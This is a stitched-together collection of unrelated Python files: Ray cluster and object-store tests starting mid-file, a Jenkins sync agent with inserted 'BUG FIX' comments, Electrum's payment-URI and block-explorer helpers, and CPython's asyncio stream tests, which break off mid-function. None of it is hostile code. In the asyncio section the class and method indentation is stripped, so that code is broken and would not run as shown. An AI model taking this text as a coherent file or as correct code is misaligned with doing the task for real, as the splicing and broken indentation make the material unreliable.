def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
    """Many actors concurrently producing store-sized objects should all
    complete (results are consumed as they finish, freeing space)."""
    @ray.remote
    class LargeMemoryActor:
        def some_expensive_task(self):
            # Each result is half the configured object store.
            return np.zeros(10**8 // 2, dtype=np.uint8)

    actors = [LargeMemoryActor.remote() for _ in range(5)]
    for _ in range(10):
        pending = [a.some_expensive_task.remote() for a in actors]
        while pending:
            [done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
    """With store retries disabled, oversized results/puts should raise
    ObjectStoreFullError without killing the producing actor."""
    ray.init(
        num_cpus=2,
        object_store_memory=10**8,
        _system_config={"object_store_full_max_retries": 0})

    @ray.remote
    def expensive_task():
        return np.zeros((10**8) // 10, dtype=np.uint8)

    # 20 tasks x 1/10th of the store overflows it; the task error should
    # wrap an ObjectStoreFullError.
    with pytest.raises(ray.exceptions.RayTaskError) as e:
        ray.get([expensive_task.remote() for _ in range(20)])
        with pytest.raises(ray.exceptions.ObjectStoreFullError):
            raise e.as_instanceof_cause()

    @ray.remote
    class LargeMemoryActor:
        def some_expensive_task(self):
            # Strictly larger than the whole store: can never fit.
            return np.zeros(10**8 + 2, dtype=np.uint8)

        def test(self):
            return 1

    actor = LargeMemoryActor.remote()
    with pytest.raises(ray.exceptions.RayTaskError):
        ray.get(actor.some_expensive_task.remote())
    # Make sure actor does not die
    ray.get(actor.test.remote())

    with pytest.raises(ray.exceptions.ObjectStoreFullError):
        ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
def test_fill_object_store_lru_fallback(shutdown_only):
    """With _lru_evict enabled, repeatedly producing store-sized objects
    should succeed (old entries are evicted) instead of raising."""
    config = {
        "free_objects_batch_size": 1,
    }
    ray.init(
        num_cpus=2,
        object_store_memory=10**8,
        _lru_evict=True,
        _system_config=config)

    @ray.remote
    def expensive_task():
        # Half the store per result, so two live results fill it.
        return np.zeros((10**8) // 2, dtype=np.uint8)

    # Check that objects out of scope are cleaned up quickly.
    ray.get(expensive_task.remote())
    start = time.time()
    for _ in range(3):
        ray.get(expensive_task.remote())
    end = time.time()
    assert end - start < 3

    # Keep the refs alive; LRU eviction must still make room.
    obj_refs = []
    for _ in range(3):
        obj_ref = expensive_task.remote()
        ray.get(obj_ref)
        obj_refs.append(obj_ref)

    @ray.remote
    class LargeMemoryActor:
        def some_expensive_task(self):
            return np.zeros(10**8 // 2, dtype=np.uint8)

        def test(self):
            return 1

    actor = LargeMemoryActor.remote()
    for _ in range(3):
        obj_ref = actor.some_expensive_task.remote()
        ray.get(obj_ref)
        obj_refs.append(obj_ref)
    # Make sure actor does not die
    ray.get(actor.test.remote())

    for _ in range(3):
        obj_ref = ray.put(np.zeros(10**8 // 2, dtype=np.uint8))
        ray.get(obj_ref)
        obj_refs.append(obj_ref)
@pytest.mark.parametrize(
    "ray_start_cluster", [{
        "num_nodes": 1,
        "num_cpus": 2,
    }, {
        "num_nodes": 2,
        "num_cpus": 1,
    }],
    indirect=True)
def test_eviction(ray_start_cluster):
    """After ray.internal.free, both direct gets and dependent tasks on the
    freed ref should raise."""
    @ray.remote
    def large_object():
        return np.zeros(10 * 1024 * 1024)

    obj = large_object.remote()
    assert (isinstance(ray.get(obj), np.ndarray))
    # Evict the object.
    ray.internal.free([obj])
    # ray.get throws an exception.
    with pytest.raises(ray.exceptions.ObjectLostError):
        ray.get(obj)

    @ray.remote
    def dependent_task(x):
        return

    # If the object is passed by reference, the task throws an
    # exception.
    with pytest.raises(ray.exceptions.RayTaskError):
        ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
    "ray_start_cluster", [{
        "num_nodes": 2,
        "num_cpus": 1,
    }, {
        "num_nodes": 1,
        "num_cpus": 2,
    }],
    indirect=True)
def test_serialized_id(ray_start_cluster):
    """Object refs serialized inside a list argument must still resolve,
    both via direct ray.get and when re-passed to another task."""
    @ray.remote
    def small_object():
        # Sleep a bit before creating the object to force a timeout
        # at the getter.
        time.sleep(1)
        return 1

    @ray.remote
    def dependent_task(x):
        return x

    @ray.remote
    def get(obj_refs, test_dependent_task):
        print("get", obj_refs)
        obj_ref = obj_refs[0]
        if test_dependent_task:
            assert ray.get(dependent_task.remote(obj_ref)) == 1
        else:
            assert ray.get(obj_ref) == 1

    # Exercise all four combinations: task-produced vs. ray.put refs,
    # resolved directly vs. through a dependent task.
    obj = small_object.remote()
    ray.get(get.remote([obj], False))

    obj = small_object.remote()
    ray.get(get.remote([obj], True))

    obj = ray.put(1)
    ray.get(get.remote([obj], False))

    obj = ray.put(1)
    ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
                         [(False, False), (False, True), (True, False),
                          (True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
    """Children (tasks or actors) must die with their parent actor, whether
    the parent's process is killed or its whole node is removed."""
    config = {
        "num_heartbeats_timeout": 10,
        "raylet_heartbeat_timeout_milliseconds": 100,
    }
    cluster = Cluster()
    # Head node with no resources.
    cluster.add_node(num_cpus=0, _system_config=config)
    ray.init(address=cluster.address)
    # Node to place the parent actor.
    node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
    # Node to place the child actor.
    cluster.add_node(num_cpus=1, resources={"child": 1})
    cluster.wait_for_nodes()

    @ray.remote
    def sleep():
        time.sleep(1000)

    @ray.remote(resources={"child": 1})
    def probe():
        return

    # TODO(swang): This test does not pass if max_restarts > 0 for the
    # raylet codepath. Add this parameter once the GCS actor service is enabled
    # by default.
    @ray.remote
    class Actor(object):
        def __init__(self):
            return

        def start_child(self, use_actors):
            if use_actors:
                child = Actor.options(resources={"child": 1}).remote()
                ray.get(child.sleep.remote())
            else:
                ray.get(sleep.options(resources={"child": 1}).remote())

        def sleep(self):
            time.sleep(1000)

        def get_pid(self):
            return os.getpid()

    # Returns whether the "child" resource is available.
    def child_resource_available():
        p = probe.remote()
        ready, _ = ray.wait([p], timeout=1)
        return len(ready) > 0

    # Test fate sharing if the parent process dies.
    def test_process_failure(use_actors):
        a = Actor.options(resources={"parent": 1}).remote()
        pid = ray.get(a.get_pid.remote())
        a.start_child.remote(use_actors=use_actors)
        # Wait for the child to be scheduled.
        wait_for_condition(lambda: not child_resource_available())
        # Kill the parent process.
        os.kill(pid, 9)
        wait_for_condition(child_resource_available)

    # Test fate sharing if the parent node dies.
    def test_node_failure(node_to_kill, use_actors):
        a = Actor.options(resources={"parent": 1}).remote()
        a.start_child.remote(use_actors=use_actors)
        # Wait for the child to be scheduled.
        wait_for_condition(lambda: not child_resource_available())
        # Kill the parent process.
        cluster.remove_node(node_to_kill, allow_graceful=False)
        node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
        wait_for_condition(child_resource_available)
        return node_to_kill

    if node_failure:
        test_node_failure(node_to_kill, use_actors)
    else:
        test_process_failure(use_actors)

    # Verify the bookkeeping: at most one worker failure recorded for a node
    # failure, at most two (parent + child) for a process failure.
    ray.state.state._check_connected()
    keys = [
        key for r in ray.state.state.redis_clients
        for key in r.keys("WORKER_FAILURE*")
    ]
    if node_failure:
        assert len(keys) <= 1, len(keys)
    else:
        assert len(keys) <= 2, len(keys)
@pytest.mark.parametrize(
    "ray_start_regular", [{
        "_system_config": {
            "ping_gcs_rpc_server_max_retries": 100
        }
    }],
    indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
    """Crashing the GCS server with SIGBUS should surface a log message
    attributed to the gcs_server process."""
    p = log_pubsub
    # Get gcs server pid to send a signal.
    all_processes = ray.worker._global_node.all_processes
    gcs_server_process = all_processes["gcs_server"][0].process
    gcs_server_pid = gcs_server_process.pid

    os.kill(gcs_server_pid, signal.SIGBUS)
    msg = None
    cnt = 0
    # wait for max 30 seconds.
    while cnt < 3000 and not msg:
        msg = p.get_message()
        if msg is None:
            time.sleep(0.01)
            cnt += 1
            continue

        data = json.loads(ray.utils.decode(msg["data"]))
        assert data["pid"] == "gcs_server"
if __name__ == "__main__":
    # Allow running this test module directly: delegate to pytest and
    # propagate its exit code.
    import pytest
    sys.exit(pytest.main(["-v", __file__]))
|
jenkins_agent.py | # Copyright 2017 Arie Bregman
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import jenkins
import logging
from multiprocessing import Process
import re
import time
from rhoci.agent import agent
from rhoci.agent import update
import rhoci.jenkins.build as build_lib
import rhoci.jenkins.job as job_lib
import rhoci.models as models
from rhoci.db.base import db
from rhoci.rhosp.dfg import get_dfg_name
LOG = logging.getLogger(__name__)
class JenkinsAgent(agent.Agent):
    """Agent that mirrors a Jenkins server's jobs and builds into the
    local database and keeps them periodically refreshed."""

    def __init__(self, name, user, password, url, app):
        super(JenkinsAgent, self).__init__(name)
        self.user = user
        self.password = password
        self.url = url
        self.app = app
        self.pre_run_process = Process(target=self.pre_start)
        try:
            self.conn = jenkins.Jenkins(self.url, self.user, self.password)
            self.active = True
        except Exception as e:
            # BUG FIX: Exception objects have no `.message` attribute on
            # Python 3 (this line itself raised AttributeError); format the
            # exception directly instead.
            LOG.info("Something went terribly wrong when " +
                     "starting Jenkins agent: %s" % e)
            self.active = False
        self.add_agent_to_db()

    def start(self):
        """Start running the Jenkins agent."""
        while True:
            time.sleep(self.app.config['RHOCI_UPDATE_INTERVAL'])
            LOG.info("Updating jobs")
            with self.app.app_context():
                update.shallow_jobs_update()
            LOG.info("Update complete")

    def pre_start(self):
        """Populate the database with information from Jenkins

        Jobs - name, last build status, last build_number
        Builds - Job name, Status, Number
        """
        with self.app.app_context():
            # If there is no update time, it means the application never
            # contacted Jenkins so run update without additional checks.
            # If there was an update, check if one hour passed since
            # last update.
            agent = models.Agent.query.filter_by(name=self.name).first()
            # BUG FIX: the original computed `update_time - utcnow()`, which
            # is negative for any past timestamp, so the hourly refresh could
            # never trigger; subtract in the correct order.
            if not agent.update_time or (datetime.datetime.utcnow() -
                                         agent.update_time >
                                         datetime.timedelta(minutes=59)):
                # Update timestamp for last Jenkins update
                models.Agent.query.filter_by(
                    name=self.name).update(dict(
                        update_time=datetime.datetime.utcnow()))
                LOG.debug("Updated agent timestamp")
                # Populate db with jobs
                job_lib.populate_db_with_jobs(agent)
            # In case application was restarted or crashed, check if active
            # builds in DB are still active
            build_lib.check_active_builds(self.conn)

    def remove_jobs_from_db(self, jobs):
        """Removes jobs from DB that no longer exist on Jenkins."""
        with self.app.app_context():
            for job in jobs:
                # BUG FIX: a SQLAlchemy Query object is always truthy, so
                # `not models.Job.query.filter_by(name=job)` never fired;
                # probe for an actual row with .first().
                if not models.Job.query.filter_by(name=job).first():
                    LOG.debug("Removing job: %s from DB" % job)

    def update_job_in_db(self, job):
        """Refresh a single job's last-build number and status in the DB."""
        last_build_result = "None"
        with self.app.app_context():
            try:
                job_info = self.conn.get_job_info(job['name'])
                last_build_number = build_lib.get_last_build_number(
                    job_info)
            except Exception as e:
                # BUG FIX: format the exception itself (no `.message` on
                # Python 3) and bail out — the original fell through and hit
                # a NameError on the unbound `last_build_number`.
                LOG.info("Unable to fetch information for %s: %s" % (
                    job['name'], e))
                return
            if last_build_number:
                last_build_result = build_lib.get_build_status(
                    self.conn, job['name'], last_build_number)
                db_build = models.Build(job=job['name'],
                                        number=last_build_number,
                                        status=last_build_result)
                db.session.add(db_build)
                db.session.commit()
            # Update entry in database
            models.Job.query.filter_by(
                name=job['name']).update(
                    dict(last_build_number=last_build_number,
                         last_build_result=last_build_result))
            db.session.commit()
            LOG.debug("Updated job from %s: %s" % (self.name, job['name']))

    def add_agent_to_db(self):
        """Adds the agent to the database."""
        with self.app.app_context():
            if not models.Agent.query.filter_by(name=self.name).count():
                db_agent = models.Agent(name=self.name,
                                        url=self.url,
                                        password=self.password)
                db.session.add(db_agent)
                db.session.commit()

    def get_job_type(self, name):
        """Returns job type based on its name."""
        if 'phase1' in name:
            return 'phase1'
        elif 'phase2' in name:
            return 'phase2'
        elif 'dfg' in name:
            # Record the DFG itself if we haven't seen it before.
            dfg = get_dfg_name(name)
            if (not models.DFG.query.filter_by(name=dfg).count() and
                    dfg.lower() != 'dfg'):
                db_dfg = models.DFG(name=dfg)
                db.session.add(db_dfg)
                db.session.commit()
            return 'dfg'
        else:
            return 'other'

    def get_job_release(self, name):
        """Return the numeric release extracted from a job name, or 0."""
        # BUG FIX: raw string for the regex (avoids the invalid escape
        # sequence warning for '\d' on Python 3.6+).
        m = re.search(r'-\d{1,2}', name)
        return m.group().split('-')[1] if m else 0
|
web.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from decimal import Decimal
import os
import re
import shutil
import threading
import urllib
from .address import Address
from . import bitcoin
from .networks import NetworkConstants
from .util import format_satoshis_plain
mainnet_block_explorers = {
'Blockchair.com': ('https://blockchair.com/bitcoin-cash',
Address.FMT_LEGACY,
{'tx': 'transaction', 'addr': 'address'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBCC',
Address.FMT_LEGACY,
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
Address.FMT_LEGACY,
{'tx': 'tx', 'addr': 'address'}),
}
regtest_block_explorers = {
# TODO ADD EXPLORER
'Blocktrail.com': ('https://www.blocktrail.com/tBCC',
Address.FMT_LEGACY,
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
Address.FMT_LEGACY,
{'tx': 'tx', 'addr': 'address'}),
}
def BE_info():
    """Return the block-explorer catalogue for the currently active network."""
    explorers = mainnet_block_explorers
    if NetworkConstants.TESTNET:
        explorers = testnet_block_explorers
    elif NetworkConstants.REGTEST:
        explorers = regtest_block_explorers
    return explorers
def BE_tuple(config):
    """Look up the configured explorer's (url, addr_fmt, parts) tuple, or None."""
    chosen = BE_from_config(config)
    return BE_info().get(chosen)
def BE_from_config(config):
    """Return the block-explorer name stored in *config*, defaulting to
    Blockchair.com when none has been chosen."""
    name = config.get('block_explorer', 'Blockchair.com')
    return name
def BE_URL(config, kind, item):
    """Build an explorer URL for *item* ('tx' or 'addr'); None if unavailable."""
    explorer = BE_tuple(config)
    if not explorer:
        return None
    url_base, addr_fmt, parts = explorer
    piece = parts.get(kind)
    if not piece:
        return None
    if kind == 'addr':
        assert isinstance(item, Address)
        item = item.to_string(addr_fmt)
    return "/".join([url_base, piece, item])
def BE_sorted_list():
    """Return the available block-explorer names in alphabetical order."""
    return sorted(BE_info().keys())
def create_URI(addr, amount, message):
    """Encode a payment URI for *addr*, with optional amount and message
    carried as query parameters. Returns "" for a non-Address input."""
    if not isinstance(addr, Address):
        return ""
    scheme, path = addr.to_URI_components()
    params = []
    if amount:
        params.append('amount=%s' % format_satoshis_plain(amount))
    if message:
        params.append('message=%s' % urllib.parse.quote(message))
    parsed = urllib.parse.ParseResult(scheme=scheme,
                                      netloc='', path=path, params='',
                                      query='&'.join(params), fragment='')
    return urllib.parse.urlunparse(parsed)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
    """Parse a payment URI into a dict of fields.

    A bare address (no scheme) is validated and returned as
    ``{'address': uri}``. Otherwise the URI must use the network's cashaddr
    scheme; recognized query keys (amount, message, time, exp, sig, r, name)
    are decoded. When *on_pr* is given and the URI references a payment
    request, it is fetched/deserialized on a background thread and passed to
    *on_pr*.

    Raises on invalid addresses, a wrong scheme, or duplicate query keys.
    """
    if ':' not in uri:
        # Test it's a valid plain address.
        Address.from_string(uri)
        return {'address': uri}

    u = urllib.parse.urlparse(uri)
    # The scheme always comes back in lower case.
    if u.scheme != NetworkConstants.CASHADDR_PREFIX:
        raise Exception("Not a {} URI".format(NetworkConstants.CASHADDR_PREFIX))
    address = u.path

    # python for android fails to parse query
    if address.find('?') > 0:
        address, query = u.path.split('?')
        pq = urllib.parse.parse_qs(query)
    else:
        pq = urllib.parse.parse_qs(u.query)

    for k, v in pq.items():
        if len(v) != 1:
            raise Exception('Duplicate Key', k)

    out = {k: v[0] for k, v in pq.items()}
    if address:
        Address.from_string(address)
        out['address'] = address
    if 'amount' in out:
        am = out['amount']
        # BUG FIX: raw string for the regex (the original '[0-9\.]' relied on
        # an invalid escape sequence; '.' needs no escape inside a class).
        # "NNNXk" means NNN * 10^(k-8), i.e. an explicit decimal exponent.
        m = re.match(r'([0-9.]+)X([0-9])', am)
        if m:
            k = int(m.group(2)) - 8
            amount = Decimal(m.group(1)) * pow(10, k)
        else:
            amount = Decimal(am) * bitcoin.COIN
        out['amount'] = int(amount)
    if 'message' in out:
        out['memo'] = out['message']
    if 'time' in out:
        out['time'] = int(out['time'])
    if 'exp' in out:
        out['exp'] = int(out['exp'])
    if 'sig' in out:
        # BUG FIX: the original called `bh2u`, which is not imported in this
        # module and raised NameError for any URI carrying a signature;
        # bytes.hex() produces the same hex string.
        out['sig'] = bitcoin.base_decode(out['sig'], None, base=58).hex()

    r = out.get('r')
    sig = out.get('sig')
    name = out.get('name')
    if on_pr and (r or (name and sig)):

        def get_payment_request_thread():
            from . import paymentrequest as pr
            if name and sig:
                s = pr.serialize_request(out).SerializeToString()
                request = pr.PaymentRequest(s)
            else:
                request = pr.get_payment_request(r)
            if on_pr:
                on_pr(request)

        t = threading.Thread(target=get_payment_request_thread)
        t.setDaemon(True)
        t.start()
    return out
def check_www_dir(rdir):
    """Ensure the payment-request web directory *rdir* exists and contains
    index.html plus its JS/CSS assets, downloading any missing files."""
    if not os.path.exists(rdir):
        os.mkdir(rdir)
    index = os.path.join(rdir, 'index.html')
    if not os.path.exists(index):
        # NOTE(review): `print_error` is not among this module's visible
        # imports — presumably provided by a wildcard/util import; confirm.
        print_error("copying index.html")
        src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
        shutil.copy(src, index)
    files = [
        "https://code.jquery.com/jquery-1.9.1.min.js",
        "https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
        "https://code.jquery.com/ui/1.10.3/jquery-ui.js",
        "https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
    ]
    for URL in files:
        # Derive the local filename from the URL path and fetch if absent.
        path = urllib.parse.urlsplit(URL).path
        filename = os.path.basename(path)
        path = os.path.join(rdir, filename)
        if not os.path.exists(path):
            print_error("downloading ", URL)
            urllib.request.urlretrieve(URL, path)
|
test_streams.py | """Tests for streams.py."""
import gc
import os
import queue
import pickle
import socket
import sys
import threading
import unittest
from unittest import mock
from test import support
try:
import ssl
except ImportError:
ssl = None
import asyncio
from test.test_asyncio import utils as test_utils
def tearDownModule():
    """Reset the global event loop policy once this module's tests finish."""
    asyncio.set_event_loop_policy(None)
class StreamTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.StreamReader(_asyncio_internal=True)
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
try:
reader, writer = self.loop.run_until_complete(open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context(),
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
self.assertEqual(messages, [])
def test_open_connection_error(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(30), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line1')
stream.feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(1024), loop=self.loop)
def cb():
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
read_task = asyncio.Task(stream.read(-1), loop=self.loop)
def cb():
stream.feed_data(b'chunk1\n')
stream.feed_data(b'chunk2')
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_invalid_limit(self):
    """StreamReader must reject non-positive limits at construction."""
    for bad_limit in (0, -1):
        with self.assertRaisesRegex(ValueError, 'imit'):
            asyncio.StreamReader(limit=bad_limit, loop=self.loop,
                                 _asyncio_internal=True)
def test_read_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'chunk1 ')
read_task = asyncio.Task(stream.readline(), loop=self.loop)
def cb():
stream.feed_data(b'chunk2 ')
stream.feed_data(b'chunk3 ')
stream.feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in StreamReader's buffer
# before the event loop is run.
stream = asyncio.StreamReader(limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'li')
stream.feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.StreamReader(limit=3, loop=self.loop,
_asyncio_internal=True)
stream.feed_data(b'li')
stream.feed_data(b'ne1')
stream.feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
stream.feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
    """readline() raises ValueError when a line exceeds the limit.

    StreamReaders are fed with data after their 'readline' methods
    are called; the over-long line is consumed from the buffer even
    though the call fails.  (Fix: dropped the unused ``as cm``
    bindings — the caught exception object was never inspected.)
    """
    stream = asyncio.StreamReader(limit=7, loop=self.loop,
                                  _asyncio_internal=True)
    def cb():
        stream.feed_data(b'chunk1')
        stream.feed_data(b'chunk2')
        stream.feed_data(b'chunk3\n')
        stream.feed_eof()
    self.loop.call_soon(cb)
    self.assertRaises(
        ValueError, self.loop.run_until_complete, stream.readline())
    # The buffer had just one (over-long) line of data, and after
    # raising a ValueError it should be empty.
    self.assertEqual(b'', stream._buffer)

    stream = asyncio.StreamReader(limit=7, loop=self.loop,
                                  _asyncio_internal=True)
    def cb():
        stream.feed_data(b'chunk1')
        stream.feed_data(b'chunk2\n')
        stream.feed_data(b'chunk3\n')
        stream.feed_eof()
    self.loop.call_soon(cb)
    self.assertRaises(
        ValueError, self.loop.run_until_complete, stream.readline())
    # Only the offending first line is dropped; the following line
    # stays buffered for the next read.
    self.assertEqual(b'chunk3\n', stream._buffer)

    # Check strictness of the limit: an 8-byte line (terminator
    # included) still succeeds with limit=7 ...
    stream = asyncio.StreamReader(limit=7, loop=self.loop,
                                  _asyncio_internal=True)
    stream.feed_data(b'1234567\n')
    line = self.loop.run_until_complete(stream.readline())
    self.assertEqual(b'1234567\n', line)
    self.assertEqual(b'', stream._buffer)

    # ... but one byte more overruns it, with or without a
    # trailing b'\n', and the buffer is drained either way.
    stream.feed_data(b'12345678\n')
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(stream.readline())
    self.assertEqual(b'', stream._buffer)

    stream.feed_data(b'12345678')
    with self.assertRaises(ValueError):
        self.loop.run_until_complete(stream.readline())
    self.assertEqual(b'', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.StreamReader(loop=self.loop,
_asyncio_internal=True)
